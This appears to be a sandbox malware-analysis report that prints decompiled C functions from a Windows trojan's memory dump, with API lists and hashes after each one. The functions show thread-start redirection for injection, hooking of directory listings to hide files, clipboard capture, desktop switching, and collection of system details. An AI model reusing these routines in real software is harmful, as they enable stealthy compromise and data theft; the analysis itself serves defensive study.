    			E0040F89A(void* __ecx, intOrPtr* __edx, WCHAR* _a4, WCHAR* _a8, signed int _a12) {
    				short _v540;
    				char _v548;
    				short _v1044;
    				short _v1052;
    				char _v1068;
    				struct _WIN32_FIND_DATAW _v1644;
    				signed char _v1660;
    				void* __esi;
    				int _t25;
    				void* _t46;
    				intOrPtr* _t52;
    				void* _t55;
    
    				_t52 = __edx;
    				_t55 = __ecx;
    				_t25 = PathCombineW( &_v1044, _a4, "*");
    				if(_t25 == 0) {
    					L12:
    					return _t25;
    				}
    				_t25 = FindFirstFileW( &_v1052,  &_v1644);
    				_t46 = _t25;
    				if(_t46 == 0xffffffff) {
    					goto L12;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					if(E0040DD5A( &(_v1644.cFileName)) == 0 && PathCombineW( &_v1052, _a4,  &(_v1644.cFileName)) != 0 && PathCombineW( &_v540, _a8,  &(_v1644.dwReserved0)) != 0) {
    						if((_v1660 & 0x00000010) == 0) {
    							if(E0040F7C1(_t55,  &_v1068,  &_v548) != 0) {
    								 *_t52 =  *_t52 + 1;
    							}
    						} else {
    							if((_a12 & 0x00000001) != 0) {
    								E0040F89A(_t55, _t52,  &_v1068,  &_v548, _a12);
    							}
    						}
    					}
    				} while (FindNextFileW(_t46,  &_v1644) != 0);
    				_t25 = FindClose(_t46);
    				goto L12;
    			}

    APIs
    • PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040F8BD
    • FindFirstFileW.KERNEL32(?,?), ref: 0040F8D8
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040F906
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040F920
    • FindNextFileW.KERNEL32(00000000,?), ref: 0040F976
    • FindClose.KERNEL32(00000000), ref: 0040F985
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CombineFindPath$File$CloseFirstNext
    • String ID:
    • API String ID: 3830188700-0
    • Opcode ID: c7f3d30fee771c94ebbb84010eb9ca13bc15842e8b04f7fba2ae8831480b82f1
    • Instruction ID: 4bb6f29023889f541fb04fed0da692a6136fd4339c4f44ec3a9529f2010b6bfd
    • Opcode Fuzzy Hash: c7f3d30fee771c94ebbb84010eb9ca13bc15842e8b04f7fba2ae8831480b82f1
    • Instruction Fuzzy Hash: 102139B1108349ABCB209F61DC48FDB77ACAF88304F04493AB955D21A1EB79D519C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406C0D(CONTEXT* __ebx, void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, void* _a20, struct _EXCEPTION_RECORD _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
    				long _v8;
    				intOrPtr _v16;
    				intOrPtr _v28;
    				void _v32;
    				intOrPtr _v48;
    				void* _v60;
    				void* _t29;
    				int _t33;
    				CONTEXT* _t37;
    				void* _t40;
    
    				_t37 = __ebx;
    				if(NtQueryInformationProcess(_a20, 0,  &_v32, 0x18,  &_v8) != 0 || _v28 == 0) { // ProcessBasicInformation (0x18 bytes on x86): _v28 = PebBaseAddress, _v16 = UniqueProcessId
    					L13:
    					return NtCreateThread(_a8, _a12, _a16, _a20, _a24, _t37, _a28, _a32);
    				} else {
    					_v8 = 0;
    					if(_v16 == 0) {
    						L11:
    						_t29 = E00406689(_a20);
    						if(_t29 != 0) {
    							 *((intOrPtr*)(_t37 + 0xb0)) = _t29 + _a4; // CONTEXT.Eax (offset 0xb0 in the x86 CONTEXT) carries the initial thread's start address; it is redirected to E00406689(target) + _a4
    						}
    						goto L13;
    					}
    					_t40 = CreateToolhelp32Snapshot(4, 0); // TH32CS_SNAPTHREAD
    					if(_t40 == 0) {
    						L10:
    						if(_v8 != 0) { // target already owns threads: fall through to the unmodified NtCreateThread
    							goto L13;
    						}
    						goto L11;
    					}
    					_v60 = 0x1c; // THREADENTRY32.dwSize
    					_t33 = Thread32First(_t40,  &_v60);
    					while(_t33 != 0) {
    						if(_v48 == _v16) { // th32OwnerProcessID == UniqueProcessId of the target
    							_v8 = _v8 + 1;
    						}
    						_t33 = Thread32Next(_t40,  &_v60);
    					}
    					CloseHandle(_t40);
    					goto L10;
    				}
    			}

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00406C24
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00406C3F
    • Thread32First.KERNEL32(00000000,?), ref: 00406C57
    • Thread32Next.KERNEL32(00000000,0000001C), ref: 00406C6F
    • CloseHandle.KERNEL32(00000000), ref: 00406C7A
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00406CB3
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CreateThread32$CloseFirstHandleInformationNextProcessQuerySnapshotThreadToolhelp32
    • String ID:
    • API String ID: 1144773994-0
    • Opcode ID: adab92d85314989b88e37dfce0848f72f061b79c578219fcb7549d0a3005826b
    • Instruction ID: 596c9f776b276621e0bae4b006aec3e198cf7ed78c82a74da0b49fd940cfe074
    • Opcode Fuzzy Hash: adab92d85314989b88e37dfce0848f72f061b79c578219fcb7549d0a3005826b
    • Instruction Fuzzy Hash: 9F212731904109EFEF229FA0DD489EFBB79EF44B44F018026F906A11A0D7349A61DBA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406EBD(void* __ecx, void* __edx, void* __eflags, signed int _a8) {
    				short _v524;
    				char _v532;
    				short _v1072;
    				struct _WIN32_FIND_DATAW _v1120;
    				short _v1636;
    				short _v1640;
    				void* _t23;
    				int _t27;
    				void* _t35;
    				void* _t36;
    				WCHAR* _t38;
    				void* _t39;
    
    				_t36 = __edx;
    				_t35 = __ecx;
    				_t14 = _a8;
    				_t38 = E0040D379(_a8 | 0xffffffff,  *_t14);
    				if(_t38 != 0) {
    					ExpandEnvironmentStringsW(_t38,  &_v1636, 0x103);
    					E0040CF40(_t38);
    					_t39 = FindFirstFileW( &_v1640,  &_v1120);
    					__eflags = _t39;
    					if(_t39 != 0) { // tested against 0, not INVALID_HANDLE_VALUE (-1): a failed FindFirstFileW still enters the loop
    						PathRemoveFileSpecW( &_v1636);
    						do {
    							__eflags = _v1120.ftCreationTime.dwFileAttributes & 0x00000010;
    							if(__eflags == 0) {
    								PathCombineW( &_v524,  &_v1636,  &_v1072);
    								E00410F35(_t35, _t36, __eflags,  &_v532, 0,  &_v532);
    							}
    							_t27 = FindNextFileW(_t39,  &(_v1120.ftCreationTime));
    							__eflags = _t27;
    						} while (_t27 != 0);
    						FindClose(_t39);
    					}
    					_t23 = 1;
    				} else {
    					_t23 = 0;
    				}
    				return _t23;
    			}

    APIs
    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000103,00000103,?), ref: 00406EEF
    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 00406F08
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 00406F19
    • PathCombineW.SHLWAPI(?,?,?), ref: 00406F3E
    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00406F5D
    • FindClose.KERNEL32(00000000), ref: 00406F68
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FileFind$Path$CloseCombineEnvironmentExpandFirstNextRemoveSpecStrings
    • String ID:
    • API String ID: 3464319278-0
    • Opcode ID: e9163ff96485a56d8eea79f39cd3f16921394b319b621041185a7e0632e42f7a
    • Instruction ID: 3dad15c2c43bd6d0f5ec2c982fc2b6c135fbad336af831e86131d67f0efbdbb5
    • Opcode Fuzzy Hash: e9163ff96485a56d8eea79f39cd3f16921394b319b621041185a7e0632e42f7a
    • Instruction Fuzzy Hash: 2B119472404259ABC731DB60DC48EDF77ECAF45310F00462AF965D2190EB78D65487AE
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(0040FCF8,00000000,00000000,00000001,F0000040,?,0040FCF8,00000000,?,-0000001C,00000000,?,?,?), ref: 0040DE8C
    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 0040DEA4
    • CryptHashData.ADVAPI32(?,00000010), ref: 0040DEBF
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040DED6
    • CryptDestroyHash.ADVAPI32(?), ref: 0040DEED
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040DEF7
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 9acb7b93bd282e57beb9a87d643aad872fbc030a24f8bb6734c427fa92ca9854
    • Instruction ID: c8ca6a164ed4834670f66c6ddd87b823e3b388fd5e94be7586e4f167e062c62d
    • Opcode Fuzzy Hash: 9acb7b93bd282e57beb9a87d643aad872fbc030a24f8bb6734c427fa92ca9854
    • Instruction Fuzzy Hash: 83110371A00209BFEF219BA0CC48FEF7B7CEF14384F008465B511A51A0D7B68A299B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409EE6() {
    				intOrPtr _t3;
    				intOrPtr _t8;
    				long _t12;
    				struct HWINSTA__* _t13;
    				struct HDESK__* _t15;
    
    				_t3 =  *0x412a64; // 0x246f5a8
    				_t12 = 0;
    				_t13 = OpenWindowStationA( *(_t3 + 0x78), 0, 0x10000000); // 0x10000000 = GENERIC_ALL
    				if(_t13 != 0) {
    					if(SetProcessWindowStation(_t13) != 0) {
    						_t8 =  *0x412a64; // 0x246f5a8
    						_t15 = OpenDesktopA( *(_t8 + 0x7c), 0, 0, 0x10000000); // 0x10000000 = GENERIC_ALL
    						if(_t15 != 0) {
    							SetThreadDesktop(_t15);
    							_t12 = 1;
    							CloseDesktop(_t15);
    						}
    					}
    					CloseWindowStation(_t13);
    				}
    				return _t12;
    			}

    APIs
    • OpenWindowStationA.USER32(?,00000000,10000000), ref: 00409EFA
    • SetProcessWindowStation.USER32(00000000), ref: 00409F07
    • OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 00409F1C
    • SetThreadDesktop.USER32(00000000), ref: 00409F29
    • CloseDesktop.USER32(00000000), ref: 00409F32
    • CloseWindowStation.USER32(00000000), ref: 00409F39
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DesktopStationWindow$CloseOpen$ProcessThread
    • String ID:
    • API String ID: 2658375134-0
    • Opcode ID: 325c9b147cd5b1911a1b42a7d90234a1db04b4cee7558b10c032773ab46f002d
    • Instruction ID: 5fe93f8376a6b322802e991380d85bb2286055e71b2690749cbd6c082b1a9494
    • Opcode Fuzzy Hash: 325c9b147cd5b1911a1b42a7d90234a1db04b4cee7558b10c032773ab46f002d
    • Instruction Fuzzy Hash: 74F054B27220256FD7202F68AD8CDEB3BACEF4A291F058076F501D3270C7A94C219778
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040528A(signed int _a4, void* _a8, _Unknown_base(*)()* _a12, void* _a16, struct _ERESOURCE_LITE _a20, void* _a24, long _a28, union _FILE_INFORMATION_CLASS _a32, long _a36, struct _EXCEPTION_RECORD _a40, char _a44) {
    				char _v524;
    				WCHAR* _v1544;
    				void _v1548;
    				void* __edi;
    				void* __esi;
    				long _t45;
    				signed int _t51;
    				void* _t53;
    				signed int _t59;
    				signed int _t60;
    				void* _t61;
    				void* _t62;
    				union _FILE_INFORMATION_CLASS _t68;
    				void* _t69;
    				intOrPtr _t71;
    				char* _t74;
    				signed int* _t76;
    				void* _t78;
    				WCHAR* _t79;
    				signed int* _t80;
    
    				_t68 = _a32;
    				_t45 = NtQueryDirectoryFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _t68, _a36, _a40, _a44);
    				_a40 = _t45;
    				if(_t45 != 0 || _a24 == _t45 || _t68 != 1 && _t68 != 2 && _t68 != 3 && _t68 != 0xc) { // only FileDirectoryInformation (1), FileFullDirectoryInformation (2), FileBothDirectoryInformation (3) and FileNamesInformation (0xc) are filtered
    					L31:
    					return _a40;
    				} else {
    					_a36 = _a36 & 0x00000000;
    					if(NtQueryObject(_a4, 1,  &_v1548, 0x400,  &_a36) != 0) { // ObjectNameInformation: full path of the directory handle being enumerated
    						goto L31;
    					}
    					_t79 =  *0x4126e8; // 0x0
    					_v1544[_v1548 & 0x0000ffff] = 0;
    					_t89 = _t79;
    					if(_t79 != 0) {
    						L11:
    						_t51 = lstrcmpiW(_t79, _v1544); // only the one directory path cached at 0x4126e8 is filtered
    						if(_t51 != 0) {
    							goto L31;
    						}
    						_a44 = _a44 & _t51;
    						_a4 = _a4 & _t51;
    						_t53 = _t68 - 1;
    						if(_t53 == 0) {
    							_a44 = 0x40; // FileName offset in FILE_DIRECTORY_INFORMATION
    							L20:
    							_a4 = 0x3c; // FileNameLength offset shared by classes 1, 2 and 3
    							L21:
    							_t69 = 0;
    							_t80 = 0;
    							do {
    								_t76 = _t80;
    								_t80 = _t69 + _a24;
    								if(E0040523F(_t80 + _a44,  *((intOrPtr*)(_t80 + _a4))) == 0) {
    									goto L26;
    								}
    								_t60 =  *_t80;
    								if(_t60 == 0) {
    									__eflags = _t76;
    									if(_t76 == 0) {
    										_a40 = 0xc000000f;
    									} else {
    										 *_t76 =  *_t76 & 0x00000000;
    									}
    									goto L31;
    								}
    								if(_t76 != 0) {
    									 *_t76 =  *_t76 + _t60;
    								}
    								L26:
    								_t59 =  *_t80;
    								_t69 = _t69 + _t59;
    							} while (_t59 > 0);
    							goto L31;
    						}
    						_t61 = _t53 - 1;
    						if(_t61 == 0) {
    							_a44 = 0x44;
    							goto L20;
    						}
    						_t62 = _t61 - 1;
    						if(_t62 == 0) {
    							_a44 = 0x5e;
    							goto L20;
    						} else {
    							if(_t62 == 9) {
    								_a44 = 0xc;
    								_a4 = 8;
    							}
    							goto L21;
    						}
    					} else {
    						E00409697( &_v524, _t89);
    						_t79 = E0040D0A7( &_v524);
    						 *0x4126e8 = _t79;
    						_t74 = 0x41249d;
    						_t78 = 2;
    						do {
    							_t24 = _t74 - 1; // 0x30000
    							_t71 =  *0x412a64; // 0x246f5a8
    							 *_t74 = E0040D3D8( *((intOrPtr*)(_t71 + ( *_t24 & 0x000000ff) * 4)));
    							_t74 = _t74 + 2;
    							_t78 = _t78 - 1;
    						} while (_t78 != 0);
    						if(_t79 == 0) {
    							goto L31;
    						}
    						goto L11;
    					}
    				}
    			}
























    APIs
    • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004052B8
    • NtQueryObject.NTDLL(?,00000001,?,00000400,00000000), ref: 00405303
    • lstrcmpiW.KERNEL32(00000000,?), ref: 00405378
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Query$DirectoryFileObjectlstrcmpi
    • String ID: <$@
    • API String ID: 2113822959-1426351568
    • Opcode ID: 5a56cb46a03c38787faa9b8a41401de7603bfcd24a3e453a318ebadfe371b95c
    • Instruction ID: 4e05d1c34119942bfa075ed3e9a392ad4945c819893fb0faa8728f68ae96352a
    • Opcode Fuzzy Hash: 5a56cb46a03c38787faa9b8a41401de7603bfcd24a3e453a318ebadfe371b95c
    • Instruction Fuzzy Hash: DE41AD32510A199BCF219F18C844BEB7BA5FF48385F14413AFD04A6290D7B9DCA1CF88
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E004106B9(signed int* __esi, signed int _a4) {
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char _v36;
    				short _v72;
    				signed short _v74;
    				signed short _v76;
    				signed short _v78;
    				signed short _v80;
    				signed char _v86;
    				signed int _v88;
    				signed short _v90;
    				signed short _v92;
    				char _v288;
    				struct _OSVERSIONINFOW _v368;
    				short _v600;
    				void* __ebx;
    				void* __edi;
    				signed int _t64;
    				intOrPtr _t102;
    				signed int _t109;
    				signed int _t111;
    				intOrPtr _t122;
    				void* _t125;
    				void* _t126;
    				void* _t127;
    				void* _t128;
    				signed int* _t130;
    				void* _t131;
    
    				_t130 = __esi;
    				_t111 = 1;
    				_v9 = 0;
    				if( *__esi == 0) {
    					_t109 = E0040FD0D();
    					 *__esi = _t109;
    					if(_t109 == 0) {
    						return 0;
    					}
    					_v9 = 1;
    				}
    				__eflags = _a4 & 0x00000001;
    				if((_a4 & 0x00000001) == 0) {
    					L9:
    					__eflags = _a4 & 0x00000002;
    					if((_a4 & 0x00000002) != 0) {
    						_push( &_v16);
    						_t128 = 4;
    						_v16 = 0x1020500;
    						_t111 = E0040FD28(_t130, 0x2713, _t118, _t128);
    					}
    					goto L11;
    				} else {
    					_t122 =  *0x412c14; // 0x0
    					_t129 =  &_v288;
    					E0040D35B(_t122,  &_v288);
    					_t102 =  *0x412a8c; // 0x416000
    					_t7 = _t102 + 8; // 0x0
    					_v80 =  *_t7 & 0x000000ff;
    					_t9 = _t102 + 9; // 0x80000000
    					_v78 =  *_t9 & 0x000000ff;
    					_t11 = _t102 + 0xa; // 0xee800000
    					_t118 =  *_t11 & 0x000000ff;
    					_v76 =  *_t11 & 0x000000ff;
    					_t13 = _t102 + 0xb; // 0x36ee8000
    					_v74 =  *_t13 & 0x000000ff;
    					_v72 = 0;
    					_t111 = E0040FD94( *_t11 & 0x000000ff, __eflags, _t130, 0x2711, _t129);
    					__eflags = _t111;
    					if(_t111 == 0) {
    						L11:
    						__eflags = _a4 & 0x00000004;
    						if((_a4 & 0x00000004) == 0) {
    							L16:
    							__eflags = _t111;
    							if(_t111 == 0) {
    								L25:
    								__eflags = _v9 - 1;
    								if(_v9 == 1) {
    									E0040CF40( *_t130);
    									 *_t130 =  *_t130 & 0x00000000;
    									__eflags =  *_t130;
    								}
    								L27:
    								return _t111;
    							}
    							__eflags = _a4 & 0x00000008;
    							if((_a4 & 0x00000008) == 0) {
    								L20:
    								__eflags = _t111;
    								if(_t111 == 0) {
    									goto L25;
    								}
    								__eflags = _a4 & 0x00000010;
    								if((_a4 & 0x00000010) != 0) {
    									_t64 = GetModuleFileNameW(0,  &_v600, 0x103);
    									__eflags = _t64;
    									if(_t64 > 0) {
    										__eflags = 0;
    										 *((short*)(_t131 + _t64 * 2 - 0x254)) = 0;
    										_t111 = E0040FD94(0, 0, _t130, 0x271e,  &_v600);
    									}
    								}
    								__eflags = _t111;
    								if(_t111 != 0) {
    									goto L27;
    								} else {
    									goto L25;
    								}
    							}
    							_v368.dwOSVersionInfoSize = 0x11c;
    							GetVersionExW( &_v368);
    							_v36 = _v368.dwMajorVersion;
    							_v32 = _v368.dwMinorVersion;
    							_v28 = _v368.dwBuildNumber;
    							_t121 = _v88 & 0x0000ffff;
    							_v24 = (_v90 & 0x0000ffff) << 0x00000010 | _v92 & 0x0000ffff;
    							_v20 = (_v86 & 0x000000ff) << 0x00000010 | _v88 & 0x0000ffff;
    							_push( &_v36);
    							_t125 = 0x14;
    							_t111 = E0040FD28(_t130, 0x271c, _v88 & 0x0000ffff, _t125);
    							__eflags = _t111;
    							if(_t111 == 0) {
    								goto L25;
    							}
    							_v16 =  *0x412c98() & 0x0000ffff;
    							_push( &_v16);
    							_t126 = 2;
    							_t111 = E0040FD28(_t130, 0x271d, _t121, _t126);
    							goto L20;
    						}
    						__eflags = _t111;
    						if(_t111 == 0) {
    							goto L25;
    						}
    						_v16 = E0040D015();
    						_push( &_v16);
    						_t127 = 4;
    						_t111 = E0040FD28(_t130, 0x2719, _t118, _t127);
    						__eflags = _t111;
    						if(_t111 == 0) {
    							goto L25;
    						}
    						_v16 = E0040D054();
    						_t111 = E0040FD28(_t130, 0x271b, _t118, _t127,  &_v16);
    						__eflags = _t111;
    						if(_t111 == 0) {
    							goto L25;
    						}
    						_v16 = GetTickCount();
    						_t111 = E0040FD28(_t130, 0x271a, _t118, _t127,  &_v16);
    						goto L16;
    					}
    					__eflags = _v80;
    					if(__eflags != 0) {
    						_t111 = E0040FD94(_t118, __eflags, _t130, 0x2712,  &_v80);
    					}
    					__eflags = _t111;
    					if(_t111 == 0) {
    						goto L11;
    					} else {
    						goto L9;
    					}
    				}
    			}




































    APIs
    • GetTickCount.KERNEL32 ref: 004107D2
    • GetVersionExW.KERNEL32(?,00000000,00000000), ref: 00410810
      • Part of subcall function 0040FD0D: RtlAllocateHeap.NTDLL(00000008,00000020,004106D4), ref: 0040FD17
    • GetUserDefaultUILanguage.KERNEL32(?), ref: 0041086A
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00000000), ref: 004108A3
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AllocateCountDefaultFileHeapLanguageModuleNameTickUserVersion
    • String ID:
    • API String ID: 1370906912-0
    • Opcode ID: e690b42c18d2051999dadb943c6944ec9968085eea55aced679ea0a99ccf83c8
    • Instruction ID: 52f9b919dec9d73a3f59e216f5e9ac745801094c2c90bd2694daddd936959e40
    • Opcode Fuzzy Hash: e690b42c18d2051999dadb943c6944ec9968085eea55aced679ea0a99ccf83c8
    • Instruction Fuzzy Hash: 4851E930A442485AEB21EBA9D8457EEB7F49F06304F044077E954EB3C2E7BC49C9DB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409697(WCHAR* __esi, void* __eflags) {
    				long _v8;
    				WCHAR* _v1028;
    				void _v1032;
    				void* _t22;
    
    				E0040966F(__esi);
    				_t22 = CreateFileW(__esi, 0x80000000, 3, 0, 3, 0x2000000, 0);
    				 *__esi = 0;
    				if(_t22 != 0xffffffff) {
    					_v8 = _v8 & 0;
    					if(NtQueryObject(_t22, 1,  &_v1032, 0x400,  &_v8) == 0 && _v1032 < 0x104) {
    						_v1028[_v1032 & 0x0000ffff] = 0;
    						lstrcpyW(__esi, _v1028);
    					}
    					return CloseHandle(_t22);
    				}
    				return 0;
    			}








    APIs
      • Part of subcall function 0040966F: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,02000000,00000000,?), ref: 004096BB
    • NtQueryObject.NTDLL(00000000,00000001,?,00000400,?), ref: 004096E3
    • lstrcpyW.KERNEL32(?,?), ref: 00409715
    • CloseHandle.KERNEL32(00000000), ref: 0040971C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateFileFolderHandleObjectPathQuerySpeciallstrcpy
    • String ID:
    • API String ID: 2309192175-0
    • Opcode ID: ef567f120559eeee839739635092bc5c78c81f6937ee7a319871cb0ab8fb6410
    • Instruction ID: a8c9d0e6cebc92cd4f7de5843069dc9e07bb58abc6f28cd539da5ad874471621
    • Opcode Fuzzy Hash: ef567f120559eeee839739635092bc5c78c81f6937ee7a319871cb0ab8fb6410
    • Instruction Fuzzy Hash: 2E01DFB5610214A7E7209B68DD85FAE72BCAF04704F1040A2F702F71C2E6B49E42875C
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000001,00000006), ref: 0040E2DD
    • bind.WS2_32(00000000,?,?), ref: 0040E2F0
    • listen.WS2_32(00000000,?), ref: 0040E2FF
    • closesocket.WS2_32(00000000), ref: 0040E30A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: d7d57c81ff8a1331083f54aa5fdaf1d6b9f57fb77cbe649db8982e9c858aa1f6
    • Instruction ID: e24d26c31cae34de6a0dc3903049515c462e2ee4bf8347298c21b24f275761da
    • Opcode Fuzzy Hash: d7d57c81ff8a1331083f54aa5fdaf1d6b9f57fb77cbe649db8982e9c858aa1f6
    • Instruction Fuzzy Hash: DAE092312051206AC6302F659D0CBDB7F68AF81761F018A35FCA1E21E0E37989B187A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004105E8() {
    				void* _t1;
    
    				E0040CFFE(_t1, 0x413468, 0, 0x24);
    				if(InitializeSecurityDescriptor(0x413474, 1) != 0 && SetSecurityDescriptorDacl(0x413474, 1, 0, 0) != 0) {
    					 *0x413470 =  *0x413470 & 0x00000000;
    					 *0x413468 = 0xc;
    					 *0x41346c = 0x413474;
    				}
    				return 1;
    			}





    APIs
    • InitializeSecurityDescriptor.ADVAPI32(00413474,00000001,00413468,00000000,00000024,00000000,004094E0), ref: 004105FF
    • SetSecurityDescriptorDacl.ADVAPI32(00413474,00000001,00000000,00000000), ref: 00410610
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DescriptorSecurity$DaclInitialize
    • String ID: t4A
    • API String ID: 625223987-373857135
    • Opcode ID: c4eb8456df5244ea749b30731b495073214d48dfe4cfd0f9aeebd7bbdfbad2df
    • Instruction ID: 0d6d73681dfe4e5e6bf51d08da96368d80da41ca7683be907a434f6208d5bc0f
    • Opcode Fuzzy Hash: c4eb8456df5244ea749b30731b495073214d48dfe4cfd0f9aeebd7bbdfbad2df
    • Instruction Fuzzy Hash: 5EE04FB0780310B6F6211F156D4ABC62A689B40B56F108026F204BD1D0C7F959D2CAAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040554F(void* __ebp, signed int _a4) {
    				intOrPtr _v0;
    				void* _v4;
    				void* _v8;
    				void* __ecx;
    				void* __edi;
    				void* _t9;
    				intOrPtr _t12;
    				void* _t23;
    				void* _t25;
    				void* _t28;
    				int _t39;
    				void* _t42;
    				void* _t43;
    
    				_t42 = __ebp;
    				_t39 = _a4;
    				_t9 = GetClipboardData(_t39);
    				_t28 = _t9;
    				_v4 = _t28;
    				if(_t28 != 0 && (_t39 == 1 || _t39 == 0xd || _t39 == 7)) {
    					GlobalFix(_t28);
    					_t23 = _t9;
    					if(_t23 != 0) {
    						_a4 = _a4 & 0x00000000;
    						if(_t39 == 0xd) {
    							_push(_t42);
    							_t26 = _t23;
    							_t43 = E0040D3D8(_t23);
    							_t12 = E0040D312(_t11, _t23);
    							_v0 = _t12;
    							if(_t12 != 0) {
    								_t40 = " ";
    								E00405452(_t26, 1, " ");
    								if(_t43 != 0) {
    									E00405452(_t26, _t43, _a4);
    								}
    								E00405452(_t26, 1, _t40);
    							}
    						} else {
    							_t41 = " ";
    							E00405452(_t25, 1, " ");
    							_t27 = _t23;
    							if(E0040D3C6(_t23) != 0) {
    								E00405452(_t27, _t19, _t23);
    							}
    							E00405452(_t27, 1, _t41);
    						}
    						E0040CF40(_a4);
    						_t28 = _v8;
    						GlobalUnWire(_t28);
    					}
    				}
    				return _t28;
    			}

















    APIs
    • GetClipboardData.USER32(?), ref: 00405557
    • GlobalFix.KERNEL32(00000000), ref: 00405580
    • GlobalUnWire.KERNEL32(?), ref: 00405613
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Global$ClipboardDataWire
    • String ID:
    • API String ID: 2697403597-0
    • Opcode ID: 388f884643870b20ef470cda4c4fc4c9952330a5442c0fe51d89c96eb75d6053
    • Instruction ID: 77db71e0d4a6e2849990123e69e3f3a5b4e07345e905206ac57c60471fb0275b
    • Opcode Fuzzy Hash: 388f884643870b20ef470cda4c4fc4c9952330a5442c0fe51d89c96eb75d6053
    • Instruction Fuzzy Hash: D0110A7690871167C711367A4C4597F6599DFC1315B05443FF84DB3292CE7CCC4289AE
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 0040E460
    • bind.WS2_32(00000000,?,?), ref: 0040E473
    • closesocket.WS2_32(00000000), ref: 0040E47E
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: bca6853dcb6051550eaaa58a8f629a6457586d29896c97e52dd6463b623a6cde
    • Instruction ID: d2d8bdefd19766b18480b8988ee799641ea943befb136c72367d8b96d28a5859
    • Opcode Fuzzy Hash: bca6853dcb6051550eaaa58a8f629a6457586d29896c97e52dd6463b623a6cde
    • Instruction Fuzzy Hash: B5E08C3120516066C2202FA95D0CEEBAA68AB05771F10CB32FDA0E21E0D3748CA286A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040A16B() {
    				intOrPtr _v0;
    
    				E0040F0FC(L"SeShutdownPrivilege");
    				return ExitWindowsEx((0 | _v0 != 0x00000000) + 0x00000001 | 0x00000004, 0) & 0xffffff00 | _t11 != 0x00000000;
    			}





    APIs
      • Part of subcall function 0040F0FC: OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040961C,SeDebugPrivilege), ref: 0040F111
      • Part of subcall function 0040F0FC: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 0040F131
